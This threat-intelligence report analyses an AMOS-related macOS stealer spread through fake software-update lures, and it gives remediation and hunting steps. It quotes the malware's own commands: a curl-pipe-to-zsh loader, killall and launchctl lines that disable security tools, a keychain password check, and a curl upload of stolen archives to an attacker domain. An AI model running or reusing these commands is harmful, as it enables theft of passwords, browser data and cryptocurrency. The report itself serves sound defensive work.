Threat reportMalwareTL-2026-2421

AMOS-Related macOS Stealer Distributed via Fake Software Updates ("Catching macOS Stealers in the Wild")

highACTIVE

AMOS-Related macOS Stealer Distributed via Fake Software (TL-2026-2421) is a high-severity malware campaign, first published 2026-04-01. It is attributed to AMOS Operators (Russia) with medium confidence, affects Apple macOS, maps to 16 MITRE ATT&CK techniques (T1005, T1027, T1036), and is covered by 9 detection rules and 21 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
16MITRE ATT&CK
Actors
1AMOS Operators
Detection rules
9SPL · KQL · Sigma
IOCs
21Indicators of compromise

Key facts for TL-2026-2421

Threat ID
TL-2026-2421
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution
AMOS Operators
Attribution confidence
MEDIUM
Nation-state nexus
Russia
Motivation
FINANCIAL
Detection rules
9
Indicators of compromise
21

Malware and tooling in AMOS-Related macOS Stealer Distributed via Fake Software

Malware and tooling: AMOS, AMOS Stealer (Atomic Stealer), BlockBlock, Little Snitch, LuLu

How AMOS-Related macOS Stealer Distributed via Fake Software works

A macOS infostealer sample, assessed as probably related to Atomic Stealer (AMOS), is distributed via a ClickFix-style fake software update lure hosted on a Squarespace subdomain, then terminates Little Snitch/BlockBlock/LuLu, phishes the local account password against the Keychain, and exfiltrates browser data, Apple Notes, documents, and 256 targeted cryptocurrency wallet extensions.

Objective-See's Patrick Wardle team (analysis authored by Pablo Redondo Castro, published 2026-04-01) documented a macOS infostealer sample assessed as probably related to Atomic Stealer (AMOS) based on shared Squarespace-hosted lure infrastructure previously seen in AMOS campaigns. Victims land on a fake software-update page (Mac-force.squarespace.com) that instructs them to copy and paste a Terminal command — a ClickFix-pattern lure: `curl -LsfSk $(echo '[base64]'|base64 -D)| zsh`. The decoded command pulls a second-stage payload from rvdownloads.com/frozenfix/update via zsh.

Before acting, the malware performs anti-analysis checks, calling `system_profiler` and inspecting the output for VM/sandbox indicators — strings such as "QEMU", "VMware", "KVM", specific hardware serial numbers ("Z31FHXYQ0J", "C07T508TG1J2", "C02TM2ZBHX87"), "Chip: Unknown", and "Intel Core 2" processors that would indicate a virtualized analysis environment rather than a real victim Mac. The payload itself is heavily obfuscated: string literals are stored as arrays of numbers reconstructed at runtime by three custom decoder functions (`ssooouzowk()`, `uyvhofylsr()`, `ljmhoouy()`) using subtraction/addition/offset-subtraction arithmetic, backed by over 400 encoded variables named `gmeaaapd0` through `gmeaaapd434`, and driven by obfuscated inline AppleScript.

Once running, the malware actively neutralizes three well-known macOS security tools before continuing: it force-kills Little Snitch and BlockBlock (`killall -9 "Little Snitch"`, `killall -9 "BlockBlock"`) and unloads LuLu's LaunchAgent (`launchctl unload ~/Library/LaunchAgents/com.objective-see.lulu.plist`). It then displays a fake system dialog claiming "Application wants to install helper" to phish the local account password, validating each entry against the local Keychain via `security find-generic-password -ga 'Safari' -w` in a loop until the correct password is captured, and writes the harvested password to `~/.pwd` in plaintext.

With the captured password it escalates to extract Safari Keychain items and pulls login data, cookies, web data, and local extension settings from Chrome, Brave Browser, Microsoft Edge, Opera Software, and Firefox. It also copies the Apple Notes database (`~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`) and note attachments, and harvests desktop/document files (`.txt, .pdf, .doc, .docx, .xls, .xlsx, .key, .pages, .numbers`) up to a 30MB cap. Separately it enumerates 256 cryptocurrency wallet browser-extension IDs (including MetaMask, Phantom, Coinbase Wallet, Binance Wallet, TerraStation, and OKX Wallet) to steal wallet extension storage. Stolen artifacts are archived with `tar` and exfiltrated via `curl -X POST -F 'file=@/tmp/archive.tar.gz' https://laislivon.com/upload` — a domain the researchers note is "related to previous AMOS campaigns."

For persistence, the malware drops a LaunchAgent at `~/Library/LaunchAgents/com.apple.mdworker.plist`, a filename chosen to masquerade as a legitimate Spotlight-related component, with an internal label of `com.apple.systemupdate` and `RunAtLoad`/`KeepAlive` both set true, embedding the complete obfuscated AppleScript stealer inline so it reruns on every login.

MITRE ATT&CK techniques used in TL-2026-2421

Collection

T1005 Data from Local System; T1119 Automated Collection; T1560 Archive Collected Data

Defense Evasion

T1027 Obfuscated Files or Information; T1036 Masquerading; T1497 Virtualization/Sandbox Evasion

Credential Access

T1056 Input Capture; T1552 Unsecured Credentials; T1555 Credentials from Password Stores

Execution

T1059 Command and Scripting Interpreter; T1204 User Execution

Command and Control

T1071 Application Layer Protocol

Discovery

T1518 Software Discovery

Persistence

T1543 Create or Modify System Process

Impact

T1657 Financial Theft

defense-impairment

T1685 Disable or Modify Tools

Affected products and versions in AMOS-Related macOS Stealer Distributed via Fake Software

  • Apple — macOS
    Vulnerable versions: All versions (social-engineering delivered malware, not a macOS vulnerability)
  • Objective-See — Little Snitch / BlockBlock / LuLu (third-party macOS security tools, targeted for termination)
    Vulnerable versions: All versions lacking self-defense/tamper protection against killall/launchctl unload
  • Multiple (Google, Brave Software, Microsoft, Opera, Mozilla) — Chrome, Brave Browser, Microsoft Edge, Opera, Firefox (browser profile data targeted)
    Vulnerable versions: All versions storing Login Data/cookies/web data in default profile paths

Remediation for AMOS-Related macOS Stealer Distributed via Fake Software

Immediate actions

  • Block network access to laislivon.com and rvdownloads.com at DNS/perimeter
  • Hunt for ~/Library/LaunchAgents/com.apple.mdworker.plist and label com.apple.systemupdate across managed macOS fleets
  • Hunt for the marker files ~/.pwd, ~/.username, ~/.marker and the dropped /tmp/helper artifact
  • Educate users never to copy/paste Terminal commands from web pages, update prompts, or CAPTCHA/verification lures (ClickFix pattern)

Workarounds

  • Restrict user-writable access to ~/Library/LaunchAgents where feasible and alert on new LaunchAgent creation
  • Disable pasting of shell commands into Terminal.app from browser clipboard where MDM tooling supports it

Longer-term hardening

  • Deploy EDR with behavioral detection for killall targeting security-tool process names and launchctl unload of third-party LaunchAgents
  • Enforce Gatekeeper/notarization and restrict execution of unsigned/ad-hoc-signed binaries downloaded via curl
  • Monitor for osascript/AppleScript invocations chained immediately after curl network activity
  • Deploy tamper-protection/self-defense monitoring for Little Snitch, BlockBlock, and LuLu so their termination triggers an alert

Timeline of AMOS-Related macOS Stealer Distributed via Fake Software

  • Objective-See publishes "Catching macOS Stealers in the Wild" (author Pablo Redondo Castro), documenting the sample and assessing it as probably AMOS-related.
  • Collected data is tar-archived and uploaded via HTTP POST to https://laislivon.com/upload, a domain researchers link to prior AMOS campaigns.
  • Stealer installs ~/Library/LaunchAgents/com.apple.mdworker.plist (label com.apple.systemupdate, RunAtLoad/KeepAlive true) embedding the full obfuscated AppleScript so it reruns on every login.
  • Stealer harvests Safari Keychain items, Chrome/Brave/Edge/Opera/Firefox browser data, the Apple Notes database, local documents, and 256 targeted cryptocurrency wallet extension identifiers.
  • Fake "Application wants to install helper" password dialog is shown and looped until the entered value validates against the local Keychain; password written to ~/.pwd.
  • Malware force-kills Little Snitch and BlockBlock via killall -9 and unloads LuLu's LaunchAgent via launchctl unload.
  • Malware calls system_profiler and inspects output for QEMU/VMware/KVM strings and known VM hardware serial numbers before continuing execution.
  • Pasted command decodes and pipes to zsh, fetching the second-stage stealer payload from rvdownloads.com/frozenfix/update.
  • Victim lands on fake software-update page at Mac-force.squarespace.com and is directed to copy/paste a Terminal command (ClickFix pattern).

Sources cited for AMOS-Related macOS Stealer Distributed via Fake Software

Detection coverage for TL-2026-2421

As of 2026-04-01, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2421 across Splunk SPL, Microsoft KQL and Sigma, covering 21 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
21 indicators of compromise · Red and above. Compare plans

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats